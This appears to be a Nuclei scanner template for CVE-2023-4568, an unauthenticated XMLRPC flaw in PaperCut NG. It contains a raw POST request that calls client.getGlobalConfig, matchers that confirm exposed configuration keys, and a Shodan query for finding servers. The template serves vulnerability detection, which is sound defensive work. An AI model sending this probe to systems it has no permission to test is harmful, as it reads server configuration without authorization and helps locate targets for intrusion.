nuclei-templates/http/cves/2023/CVE-2023-4568.yaml

56 lines
1.9 KiB
YAML
Raw Normal View History

2023-09-18 17:36:47 +00:00
id: CVE-2023-4568
info:
name: PaperCut NG Unauthenticated XMLRPC Functionality
author: DhiyaneshDK
severity: medium
description: |
PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information.
2023-09-18 17:36:47 +00:00
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-4568
- https://www.tenable.com/security/research/tra-2023-31
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2023-4568
cwe-id: CWE-287
epss-score: 0.00254
epss-percentile: 0.6331
2023-09-18 17:36:47 +00:00
cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: papercut
product: papercut_ng
2024-04-23 15:41:49 +00:00
shodan-query: html:"content=\"PaperCut\""
2024-01-14 09:21:50 +00:00
tags: cve2023,cve,unauth,papercut
2023-09-18 17:36:47 +00:00
http:
- raw:
- |
POST /rpc/clients/xmlrpc HTTP/1.1
Host: {{Hostname}}
Content-Type:text/xml
<?xml version="1.0"?><methodCall><methodName>client.getGlobalConfig</methodName><params><param><value><string>str1</string></value></param><param><value><string>str2</string></value></param></params></methodCall>
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'conf.ssl-port'
- 'conf.auth-ttl-default'
condition: and
- type: word
part: header
words:
- text/xml
- type: status
status:
- 200
# digest: 4a0a00473045022025b4e549e5cbd393beb59ce312d7a29bca8d0ab3b16c64fcf93b2ff8aa4875d0022100bd23ccd1b14160f48ab3c24a399e2817f0d49b50869d7cc20c63a6f9a5c35920:922c64590222798bb761d5b6d8e72950